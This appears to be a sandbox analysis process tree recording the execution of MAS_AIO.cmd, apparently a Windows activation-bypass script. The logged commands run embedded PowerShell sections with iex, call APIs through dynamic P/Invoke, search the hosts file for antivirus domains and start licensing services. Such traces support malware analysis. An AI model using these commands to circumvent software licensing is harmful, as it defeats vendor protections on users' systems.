C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5828 /prefetch:82⤵PID:1048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:12⤵PID:2316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,17417735289199992089,13969044616882732182,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\MAS_AIO.cmd" "2⤵PID:1188
-
C:\Windows\System32\sc.exesc query Null3⤵
- Launches sc.exe
PID:3256
-
-
C:\Windows\System32\find.exefind /i "RUNNING"3⤵PID:3184
-
-
C:\Windows\System32\findstr.exefindstr /v "$" "MAS_AIO.cmd"3⤵PID:5452
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c ver3⤵PID:6028
-
-
C:\Windows\System32\reg.exereg query "HKCU\Console" /v ForceV23⤵PID:2992
-
-
C:\Windows\System32\find.exefind /i "0x0"3⤵PID:4648
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "3⤵PID:4328
-
-
C:\Windows\System32\find.exefind /i "ARM64"3⤵PID:4852
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c echo prompt $E | cmd3⤵PID:1072
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "4⤵PID:1120
-
-
C:\Windows\System32\cmd.execmd4⤵PID:6000
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "C:\Users\Admin\Downloads\MAS_AIO.cmd" "3⤵PID:948
-
-
C:\Windows\System32\find.exefind /i "C:\Users\Admin\AppData\Local\Temp"3⤵PID:5060
-
-
C:\Windows\System32\cmd.execmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])""3⤵PID:1004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1236
-
-
-
C:\Windows\System32\find.exefind /i "FullLanguage"3⤵PID:4436
-
-
C:\Windows\System32\fltMC.exefltmc3⤵PID:3988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1536
-
-
C:\Windows\System32\find.exefind /i "True"3⤵PID:1176
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5616
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2076
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:540
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:5864
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\MAS_AIO.cmd"1⤵PID:6028
-
C:\Windows\System32\sc.exesc query Null2⤵
- Launches sc.exe
PID:4328
-
-
C:\Windows\System32\find.exefind /i "RUNNING"2⤵PID:5508
-
-
C:\Windows\System32\findstr.exefindstr /v "$" "MAS_AIO.cmd"2⤵PID:1996
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c ver2⤵PID:1416
-
-
C:\Windows\System32\reg.exereg query "HKCU\Console" /v ForceV22⤵PID:5492
-
-
C:\Windows\System32\find.exefind /i "0x0"2⤵PID:4180
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "2⤵PID:4388
-
-
C:\Windows\System32\find.exefind /i "ARM64"2⤵PID:5300
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c echo prompt $E | cmd2⤵PID:3852
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "3⤵PID:2652
-
-
C:\Windows\System32\cmd.execmd3⤵PID:5644
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "C:\Users\Admin\Downloads\MAS_AIO.cmd" "2⤵PID:4148
-
-
C:\Windows\System32\find.exefind /i "C:\Users\Admin\AppData\Local\Temp"2⤵PID:5260
-
-
C:\Windows\System32\cmd.execmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])""2⤵PID:5820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5608
-
-
-
C:\Windows\System32\find.exefind /i "FullLanguage"2⤵PID:4840
-
-
C:\Windows\System32\fltMC.exefltmc2⤵PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5536
-
-
C:\Windows\System32\find.exefind /i "True"2⤵PID:1876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '"""C:\Users\Admin\Downloads\MAS_AIO.cmd""" -el -qedit'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5124 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\Downloads\MAS_AIO.cmd" -el -qedit"3⤵PID:2428
-
C:\Windows\System32\sc.exesc query Null4⤵
- Launches sc.exe
PID:6076
-
-
C:\Windows\System32\find.exefind /i "RUNNING"4⤵PID:1688
-
-
C:\Windows\System32\findstr.exefindstr /v "$" "MAS_AIO.cmd"4⤵PID:2860
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "4⤵PID:3828
-
-
C:\Windows\System32\find.exefind /i "/"4⤵PID:2128
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c ver4⤵PID:4668
-
-
C:\Windows\System32\reg.exereg query "HKCU\Console" /v ForceV24⤵PID:2868
-
-
C:\Windows\System32\find.exefind /i "0x0"4⤵PID:4944
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "4⤵PID:5444
-
-
C:\Windows\System32\find.exefind /i "ARM64"4⤵PID:5856
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c echo prompt $E | cmd4⤵PID:3128
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "5⤵PID:3576
-
-
C:\Windows\System32\cmd.execmd5⤵PID:3008
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "C:\Users\Admin\Downloads\MAS_AIO.cmd" "4⤵PID:2820
-
-
C:\Windows\System32\find.exefind /i "C:\Users\Admin\AppData\Local\Temp"4⤵PID:4696
-
-
C:\Windows\System32\cmd.execmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])""4⤵PID:5292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2792
-
-
-
C:\Windows\System32\find.exefind /i "FullLanguage"4⤵PID:2612
-
-
C:\Windows\System32\fltMC.exefltmc4⤵PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"4⤵
- Command and Scripting Interpreter: PowerShell
PID:836
-
-
C:\Windows\System32\find.exefind /i "True"4⤵PID:3664
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c ping -4 -n 1 updatecheck.massgrave.dev4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5236 -
C:\Windows\System32\PING.EXEping -4 -n 1 updatecheck.massgrave.dev5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6120
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "127.69.2.8" "4⤵PID:6124
-
-
C:\Windows\System32\find.exefind "127.69"4⤵PID:3724
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "127.69.2.8" "4⤵PID:4760
-
-
C:\Windows\System32\find.exefind "127.69.2.8"4⤵PID:1636
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "4⤵PID:1100
-
-
C:\Windows\System32\find.exefind /i "/S"4⤵PID:2856
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "4⤵PID:376
-
-
C:\Windows\System32\find.exefind /i "/"4⤵PID:1988
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop4⤵PID:1400
-
C:\Windows\System32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop5⤵PID:5272
-
-
-
C:\Windows\System32\mode.commode 76, 334⤵PID:5456
-
-
C:\Windows\System32\choice.exechoice /C:123456789H0 /N4⤵PID:4756
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c ver4⤵PID:5428
-
-
C:\Windows\System32\reg.exereg query "HKCU\Console" /v ForceV24⤵PID:5504
-
-
C:\Windows\System32\find.exefind /i "0x0"4⤵PID:3712
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "4⤵PID:2976
-
-
C:\Windows\System32\find.exefind /i "ARM64"4⤵PID:4572
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c echo prompt $E | cmd4⤵PID:1216
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "5⤵PID:6128
-
-
C:\Windows\System32\cmd.execmd5⤵PID:1744
-
-
-
C:\Windows\System32\mode.commode 76, 254⤵PID:5116
-
-
C:\Windows\System32\choice.exechoice /C:120 /N4⤵PID:5624
-
-
C:\Windows\System32\mode.commode 110, 344⤵PID:5196
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s4⤵PID:6100
-
-
C:\Windows\System32\find.exefind /i "AutoPico"4⤵PID:4260
-
-
C:\Windows\System32\find.exefind /i "avira.com" C:\Windows\System32\drivers\etc\hosts4⤵PID:5652
-
-
C:\Windows\System32\find.exefind /i "kaspersky.com" C:\Windows\System32\drivers\etc\hosts4⤵PID:4932
-
-
C:\Windows\System32\find.exefind /i "virustotal.com" C:\Windows\System32\drivers\etc\hosts4⤵PID:3780
-
-
C:\Windows\System32\find.exefind /i "mcafee.com" C:\Windows\System32\drivers\etc\hosts4⤵PID:4504
-
-
C:\Windows\System32\sc.exesc start sppsvc4⤵
- Launches sc.exe
PID:2340
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "1056" "4⤵PID:1900
-
-
C:\Windows\System32\findstr.exefindstr "577 225"4⤵PID:2284
-
-
C:\Windows\System32\cmd.execmd /c "wmic path Win32_ComputerSystem get CreationClassName /value"4⤵PID:3772
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value5⤵PID:1880
-
-
-
C:\Windows\System32\find.exefind /i "computersystem"4⤵PID:4208
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku"4⤵PID:1576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku5⤵PID:4288
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn 2>nul4⤵PID:5960
-
C:\Windows\System32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn5⤵PID:5472
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c "wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST" 2>nul4⤵PID:5600
-
C:\Windows\System32\Wbem\WMIC.exewmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST5⤵PID:5776
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':winsubstatus\:.*';iex ($f[1])"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4852
-
-
C:\Windows\System32\find.exefind /i "Subscription_is_activated"4⤵PID:5832
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"4⤵PID:5644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')5⤵
- Command and Scripting Interpreter: PowerShell
PID:4676
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "Windows 10 Enterprise LTSC" "4⤵PID:3288
-
-
C:\Windows\System32\find.exefind /i "Windows"4⤵PID:6112
-
-
C:\Windows\System32\sc.exesc start sppsvc4⤵
- Launches sc.exe
PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$job = Start-Job { (Get-WmiObject -Query 'SELECT * FROM SoftwareLicensingService').Version }; if (-not (Wait-Job $job -Timeout 30)) {write-host 'sppsvc is not working correctly. Help - https://massgrave.dev/troubleshoot'}"4⤵PID:2020
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Command and Scripting Interpreter: PowerShell
PID:2300
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (LicenseStatus='1' and GracePeriodRemaining='0' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get Name /value4⤵PID:2128
-
-
C:\Windows\System32\findstr.exefindstr /i "Windows"4⤵PID:3140
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE4⤵PID:2120
-
C:\Windows\System32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE5⤵PID:3784
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c ver4⤵PID:5588
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s4⤵PID:2492
-
-
C:\Windows\System32\find.exefind /i "AutoPico"4⤵PID:5800
-
-
C:\Windows\System32\find.exefind /i "avira.com" C:\Windows\System32\drivers\etc\hosts4⤵PID:2820
-
-
C:\Windows\System32\find.exefind /i "kaspersky.com" C:\Windows\System32\drivers\etc\hosts4⤵PID:420
-
-
C:\Windows\System32\find.exefind /i "virustotal.com" C:\Windows\System32\drivers\etc\hosts4⤵PID:5476
-
-
C:\Windows\System32\find.exefind /i "mcafee.com" C:\Windows\System32\drivers\etc\hosts4⤵PID:700
-
-
C:\Windows\System32\sc.exesc start sppsvc4⤵
- Launches sc.exe
PID:5692
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "1056" "4⤵PID:2476
-
-
C:\Windows\System32\findstr.exefindstr "577 225"4⤵PID:1492
-
-
C:\Windows\System32\sc.exesc query Null4⤵
- Launches sc.exe
PID:796
-
-
C:\Windows\System32\sc.exesc start ClipSVC4⤵
- Launches sc.exe
PID:4564
-
-
C:\Windows\System32\sc.exesc query ClipSVC4⤵
- Launches sc.exe
PID:3644
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DependOnService4⤵
- Modifies registry key
PID:632
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Description4⤵
- Modifies registry key
PID:4948
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DisplayName4⤵
- Modifies registry key
PID:5392
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ErrorControl4⤵
- Modifies registry key
PID:1824
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ImagePath4⤵
- Modifies registry key
PID:2216
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ObjectName4⤵
- Modifies registry key
PID:2964
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Start4⤵
- Modifies registry key
PID:2464
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Type4⤵
- Modifies registry key
PID:4568
-
-
C:\Windows\System32\sc.exesc start sppsvc4⤵
- Launches sc.exe
PID:3580
-
-
C:\Windows\System32\sc.exesc query sppsvc4⤵
- Launches sc.exe
PID:3420
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DependOnService4⤵
- Modifies registry key
PID:768
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Description4⤵
- Modifies registry key
PID:1768
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DisplayName4⤵
- Modifies registry key
PID:6124
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ErrorControl4⤵
- Modifies registry key
PID:1224
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ImagePath4⤵
- Modifies registry key
PID:4760
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ObjectName4⤵
- Modifies registry key
PID:5760
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Start4⤵
- Modifies registry key
PID:1100
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Type4⤵
- Modifies registry key
PID:560
-
-
C:\Windows\System32\sc.exesc start KeyIso4⤵
- Launches sc.exe
PID:376
-
-
C:\Windows\System32\sc.exesc query KeyIso4⤵
- Launches sc.exe
PID:5568
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DependOnService4⤵
- Modifies registry key
PID:1056
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Description4⤵
- Modifies registry key
PID:1400
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v DisplayName4⤵
- Modifies registry key
PID:2460
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ErrorControl4⤵
- Modifies registry key
PID:1312
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ImagePath4⤵
- Modifies registry key
PID:4672
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v ObjectName4⤵
- Modifies registry key
PID:5296
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Start4⤵
- Modifies registry key
PID:5056
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\KeyIso /v Type4⤵
- Modifies registry key
PID:2204
-
-
C:\Windows\System32\sc.exesc start Winmgmt4⤵
- Launches sc.exe
PID:3616
-
-
C:\Windows\System32\sc.exesc query Winmgmt4⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DependOnService4⤵
- Modifies registry key
PID:2124
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Description4⤵
- Modifies registry key
PID:1744
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v DisplayName4⤵
- Modifies registry key
PID:3976
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ErrorControl4⤵
- Modifies registry key
PID:2636
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ImagePath4⤵
- Modifies registry key
PID:3736
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v ObjectName4⤵
- Modifies registry key
PID:2604
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Start4⤵
- Modifies registry key
PID:5780
-
-
C:\Windows\System32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\Winmgmt /v Type4⤵
- Modifies registry key
PID:800
-
-
C:\Windows\System32\sc.exesc start ClipSVC4⤵
- Launches sc.exe
PID:4140
-
-
C:\Windows\System32\sc.exesc start sppsvc4⤵
- Launches sc.exe
PID:4656
-
-
C:\Windows\System32\sc.exesc start KeyIso4⤵
- Launches sc.exe
PID:3092
-
-
C:\Windows\System32\sc.exesc start Winmgmt4⤵
- Launches sc.exe
PID:2340
-
-
C:\Windows\System32\sc.exesc query ClipSVC4⤵
- Launches sc.exe
PID:720
-
-
C:\Windows\System32\find.exefind /i "RUNNING"4⤵PID:2032
-
-
C:\Windows\System32\sc.exesc start ClipSVC4⤵
- Launches sc.exe
PID:2756
-
-
C:\Windows\System32\sc.exesc query sppsvc4⤵
- Launches sc.exe
PID:5984
-
-
C:\Windows\System32\find.exefind /i "RUNNING"4⤵PID:1700
-
-
C:\Windows\System32\sc.exesc start sppsvc4⤵
- Launches sc.exe
PID:3164
-
-
C:\Windows\System32\sc.exesc query KeyIso4⤵
- Launches sc.exe
PID:5868
-
-
C:\Windows\System32\find.exefind /i "RUNNING"4⤵PID:5108
-
-
C:\Windows\System32\sc.exesc start KeyIso4⤵
- Launches sc.exe
PID:876
-
-
C:\Windows\System32\sc.exesc query Winmgmt4⤵
- Launches sc.exe
PID:5524
-
-
C:\Windows\System32\find.exefind /i "RUNNING"4⤵PID:2844
-
-
C:\Windows\System32\sc.exesc start Winmgmt4⤵
- Launches sc.exe
PID:692
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState4⤵PID:5688
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\State" /v ImageState5⤵PID:1452
-
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinPE" /v InstRoot4⤵PID:5448
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':wpatest\:.*';iex ($f[1])" 2>nul4⤵PID:4068
-
